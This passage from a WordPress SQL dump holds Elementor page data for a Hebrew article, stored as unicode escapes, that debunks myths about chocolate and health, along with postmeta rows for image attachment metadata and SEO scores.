\\u05d4\\\"\\u05e6\\u05d5\\u05e8\\u05da\\\" \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d4 \\u05e9\\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d4\\u05e7\\u05e9\\u05d5\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d8\\u05d4 \\u05d1\\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d7\\u05dd \\u05dc\\u05d0 \\u05e0\\u05d7\\u05e9\\u05d1<\\/strong><\\/h2><p>\\u05d0\\u05d1\\u05e7\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d4\\u05de\\u05e9\\u05de\\u05e9\\u05ea \\u05dc\\u05d4\\u05db\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dd \\u05de\\u05db\\u05d9\\u05dc\\u05d4 \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d5\\u05de\\u05df, \\u05db\\u05d9 \\u05d0\\u05d9\\u05e0\\u05d4 \\u05db\\u05d5\\u05dc\\u05dc\\u05ea \\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d5\\u05e9\\u05d5\\u05de\\u05e0\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d0\\u05dc\\u05d0 \\u05e9\\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05ea\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e2\\u05ea \\u05d2\\u05dd \\u05e2\\u05dc \\u05de\\u05d4 \\u05e9\\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05d4 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d4\\u05d7\\u05dd. \\u05db\\u05da, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d0\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05d5 \\u05e1\\u05d5\\u05db\\u05e8, \\u05e7\\u05e6\\u05e4\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05e6\\u05ea \\u05e4\\u05d9\\u05e8\\u05d5\\u05e8\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05dc\\u05de\\u05e2\\u05dc\\u05d4, \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd, \\u05de\\u05e7\\u05d1\\u05dc\\u05d9\\u05dd \\u05de\\u05e9\\u05e7\\u05d4 \\u05e2\\u05ea\\u05d9\\u05e8 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea. \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d0\\u05dd \\u05e9\\u05d5\\u05ea\\u05d9\\u05dd \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dd \\u05db\\u05de\\u05d4 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05dc\\u05d9\\u05d3.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(850,176,'_elementor_edit_mode','builder'),(851,176,'_wp_page_template','default'),(852,176,'_elementor_data','[{\"id\":\"64aada\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1423db10\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a73781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea: \\u05d4\\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05e9\\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05dc\\u05d4\\u05d0\\u05de\\u05d9\\u05df \\u05dc\\u05d4\\u05df<\\/h2><p>\\u05de\\u05d3\\u05d9 \\u05d7\\u05d5\\u05d3\\u05e9 \\u05de\\u05ea\\u05e4\\u05e8\\u05e1\\u05de\\u05d5\\u05ea \\u05d1\\u05ea\\u05e7\\u05e9\\u05d5\\u05e8\\u05ea \\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05d7\\u05d3\\u05e9\\u05d5\\u05ea \\u05d4\\u05e0\\u05d5\\u05d2\\u05e2\\u05d5\\u05ea \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05d0\\u05d7\\u05d3, \\u05d4\\u05e8\\u05d5\\u05e4\\u05d0\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05e7\\u05d5\\u05e8\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05dc\\u05d4\\u05e4\\u05e1\\u05d9\\u05e7 \\u05db\\u05dc\\u05d9\\u05dc \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05e9\\u05dc\\u05d0\\u05d7\\u05e8\\u05d9\\u05d5, \\u05de\\u05e1\\u05ea\\u05d1\\u05e8 \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d0\\u05d7\\u05ea \\u05d5\\u05dc\\u05ea\\u05de\\u05d9\\u05d3, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05e0\\u05d7\\u05dc\\u05d9\\u05e3 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05d4\\u05e0\\u05e4\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea, \\u05e2\\u05dd \\u05d4\\u05d0\\u05de\\u05ea. \\u05e8\\u05de\\u05d6: \\u05db\\u05de\\u05d5 \\u05d1\\u05db\\u05dc \\u05d3\\u05d1\\u05e8 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd, \\u05de\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05e4\\u05ea\\u05d7 \\u05d4\\u05d9\\u05d0 \\u05de\\u05ea\\u05d9\\u05e0\\u05d5\\u05ea.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e4\\u05d5\\u05dc\\u05d9 \\u05e7\\u05e7\\u05d0\\u05d5, \\u05d4\\u05de\\u05e8\\u05db\\u05d9\\u05d1 \\u05d4\\u05e2\\u05d9\\u05e7\\u05e8\\u05d9 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d5\\u05dc\\u05d9\\u05e4\\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05d8\\u05d1\\u05e2\\u05d9\\u05d9\\u05dd. \\u05e8\\u05d0\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05e2\\u05d9\\u05d5\\u05ea \\u05de\\u05d5\\u05db\\u05d9\\u05d7\\u05d5\\u05ea \\u05e9\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05dc\\u05d5 \\u05de\\u05e1\\u05d9\\u05d9\\u05e2\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d7\\u05ea\\u05ea \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d1\\u05e9\\u05dc \\u05d4\\u05ea\\u05db\\u05d5\\u05e0\\u05d5\\u05ea \\u05e0\\u05d5\\u05d2\\u05d3\\u05d5\\u05ea \\u05d4\\u05d7\\u05de\\u05e6\\u05d5\\u05df \\u05e9\\u05dc\\u05d4\\u05dd.<\\/p><p>\\u05d0\\u05da \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d2\\u05dd \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df \\u05e8\\u05d5\\u05d5\\u05d9. \\u05d6\\u05d4\\u05d5 \\u05d4\\u05de\\u05db\\u05d9\\u05dc \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d3\\u05d9 \\u05de\\u05de\\u05e0\\u05d5 \\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05dc \\u05e2\\u05d5\\u05d3\\u05e3, \\u05d5\\u05d4\\u05d2\\u05d1\\u05e8\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05de\\u05d7\\u05dc\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05ea\\u05df \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05e4\\u05d0\\u05d9\\u05df, \\u05e9\\u05e2\\u05e9\\u05d5\\u05d9 \\u05dc\\u05ea\\u05e8\\u05d5\\u05dd \\u05dc\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e9\\u05d4\\u05d5\\u05d0 \\u05de\\u05d2\\u05d1\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05d1\\u05d2\\u05d5\\u05e3. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05d6\\u05d4 \\u05e0\\u05db\\u05d5\\u05df, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05de\\u05e1\\u05e4\\u05e7\\u05d9\\u05dd \\u05e9\\u05d7\\u05e8\\u05d5\\u05e8 \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05de\\u05ea\\u05de\\u05e9\\u05db\\u05ea, \\u05d5\\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d1\\u05e8\\u05d9\\u05d0 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d5\\u05e6\\u05e7 \\u05d5\\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1, \\u05d0\\u05da \\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05ea\\u05dc\\u05d5\\u05d9\\u05d4 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e9\\u05d1\\u05d5 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e2\\u05d5\\u05d1\\u05d3, \\u05d5\\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05ea\\u05de\\u05e7\\u05d3 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05ea\\u05d4\\u05dc\\u05d9\\u05da \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8, \\u05e0\\u05d9\\u05e7\\u05d5\\u05d9, \\u05ea\\u05e1\\u05d9\\u05e1\\u05d4, \\u05d6\\u05de\\u05df \\u05e6\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d5\\u05d8\\u05de\\u05e4\\u05e8\\u05d8\\u05d5\\u05e8\\u05d4, \\u05ea\\u05d5\\u05e1\\u05e4\\u05ea \\u05d0\\u05dc\\u05e7\\u05dc\\u05d9\\u05d6\\u05e6\\u05d9\\u05d4 \\u05d5\\u05d4\\u05d5\\u05e1\\u05e4\\u05ea \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e7\\u05e7\\u05d0\\u05d5, \\u05db\\u05d2\\u05d5\\u05df \\u05e1\\u05d5\\u05db\\u05e8 \\u05dc\\u05de\\u05e9\\u05dc, \\u05de\\u05e1\\u05d9\\u05e8\\u05d9\\u05dd \\u05db\\u05de\\u05e2\\u05d8 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05de\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05e8\\u05d9\\u05e8.<\\/p><h2><strong>\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05df \\u05d0\\u05d7\\u05d3 \\u05d1\\u05d9\\u05d5\\u05dd \\u05dc\\u05d0 \\u05de\\u05d6\\u05d9\\u05e7 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05db\\u05dc \\u05e2\\u05d5\\u05d3 \\u05de\\u05e1\\u05ea\\u05e4\\u05e7\\u05d9\\u05dd \\u05d1\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e7\\u05d8\\u05df \\u05d6\\u05d4 \\u05d1\\u05dc\\u05d1\\u05d3. \\u05d7\\u05de\\u05d9\\u05e9\\u05d4 \\u05d7\\u05d8\\u05d9\\u05e4\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05d5\\u05d1\\u05d9\\u05dc\\u05d5 \\u05dc\\u05e2\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d1\\u05de\\u05e9\\u05e7\\u05dc. \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d1\\u05de\\u05de\\u05d5\\u05e6\\u05e2 250 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05db\\u05de\\u05e2\\u05d8 \\u05e8\\u05d1\\u05e2 \\u05de\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d5\\u05de\\u05dc\\u05e6\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d1\\u05de\\u05e7\\u05d5\\u05dd \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05dc\\u05d5\\u05e9 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd, \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05d1\\u05e1\\u05d1\\u05d9\\u05d1\\u05d5\\u05ea 30-50 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d1\\u05db\\u05da \\u05dc\\u05e1\\u05e4\\u05e7 \\u05d0\\u05ea \\u05d4\\u05ea\\u05e9\\u05d5\\u05e7\\u05d4 \\u05dc\\u05de\\u05e9\\u05d4\\u05d5 \\u05de\\u05ea\\u05d5\\u05e7, \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e1\\u05db\\u05df \\u05d0\\u05ea \\u05d4\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea \\u05d0\\u05d5 \\u05dc\\u05d4\\u05d5\\u05e1\\u05d9\\u05e3 \\u05dc\\u05de\\u05e9\\u05e7\\u05dc.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05de\\u05db\\u05e8<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05d0\\u05d1\\u05dc \\u05d1\\u05d0\\u05d5\\u05ea\\u05d4 \\u05de\\u05d9\\u05d3\\u05d4 \\u05d2\\u05dd \\u05d0\\u05e4\\u05e8\\u05e1\\u05e7\\u05d9\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05d5\\u05d1\\u05d9\\u05dc \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea \\u05d0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e4\\u05e1\\u05d9\\u05e7\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05dd. \\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05d1\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05d2\\u05d9\\u05e8\\u05d5\\u05d9\\u05d9\\u05dd \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea. \\u05d4\\u05e8\\u05d2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05dd \\u05d4\\u05de\\u05db\\u05ea\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05d4\\u05ea\\u05e0\\u05d4\\u05d2\\u05d5\\u05ea, \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d4 \\u05dc\\u05d7\\u05e9\\u05d9\\u05d1\\u05d4 \\u05d4\\u05de\\u05e7\\u05e9\\u05e8\\u05ea \\u05d0\\u05db\\u05d9\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05ea\\u05d7\\u05d5\\u05e9\\u05ea \\u05e0\\u05d5\\u05d7\\u05d5\\u05ea, \\u05ea\\u05d2\\u05de\\u05d5\\u05dc \\u05d5\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4.<\\/p><p>\\u05d4\\u05e7\\u05e9\\u05e8 \\u05d4\\u05d6\\u05d4 \\u05de\\u05db\\u05ea\\u05d9\\u05d1 \\u05d0\\u05ea \\u05d4\\\"\\u05e6\\u05d5\\u05e8\\u05da\\\" \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d4 \\u05e9\\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d4\\u05e7\\u05e9\\u05d5\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d8\\u05d4 \\u05d1\\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d7\\u05dd \\u05dc\\u05d0 \\u05e0\\u05d7\\u05e9\\u05d1<\\/strong><\\/h2><p>\\u05d0\\u05d1\\u05e7\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d4\\u05de\\u05e9\\u05de\\u05e9\\u05ea \\u05dc\\u05d4\\u05db\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dd \\u05de\\u05db\\u05d9\\u05dc\\u05d4 \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d5\\u05de\\u05df, \\u05db\\u05d9 \\u05d0\\u05d9\\u05e0\\u05d4 \\u05db\\u05d5\\u05dc\\u05dc\\u05ea \\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d5\\u05e9\\u05d5\\u05de\\u05e0\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d0\\u05dc\\u05d0 \\u05e9\\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05ea\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e2\\u05ea \\u05d2\\u05dd \\u05e2\\u05dc \\u05de\\u05d4 \\u05e9\\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05d4 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d4\\u05d7\\u05dd. \\u05db\\u05da, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d0\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05d5 \\u05e1\\u05d5\\u05db\\u05e8, \\u05e7\\u05e6\\u05e4\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05e6\\u05ea \\u05e4\\u05d9\\u05e8\\u05d5\\u05e8\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05dc\\u05de\\u05e2\\u05dc\\u05d4, \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd, \\u05de\\u05e7\\u05d1\\u05dc\\u05d9\\u05dd \\u05de\\u05e9\\u05e7\\u05d4 \\u05e2\\u05ea\\u05d9\\u05e8 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea. \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d0\\u05dd \\u05e9\\u05d5\\u05ea\\u05d9\\u05dd \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dd \\u05db\\u05de\\u05d4 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05dc\\u05d9\\u05d3.<\\/p><p>Read <a href=\\\"https:\\/\\/html-online.com\\/articles\\/\\\">HTML code related articles<\\/a> on our blog to get the best tips on web content composing.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(853,174,'_elementor_version','0.4'),(854,177,'_wp_attached_file','2018/05/choclate-myth.jpg'),(855,177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:25:\"2018/05/choclate-myth.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"choclate-myth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"choclate-myth-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"choclate-myth-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"choclate-myth-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:25:\"choclate-myth-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(856,174,'_thumbnail_id','177'),(859,174,'_yoast_wpseo_content_score','60'),(860,178,'_elementor_edit_mode','builder'),(861,178,'_wp_page_template','default'),(862,178,'_elementor_data','[{\"id\":\"64aada\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1423db10\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a73781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea: \\u05d4\\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05e9\\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05dc\\u05d4\\u05d0\\u05de\\u05d9\\u05df \\u05dc\\u05d4\\u05df<\\/h2><p>\\u05de\\u05d3\\u05d9 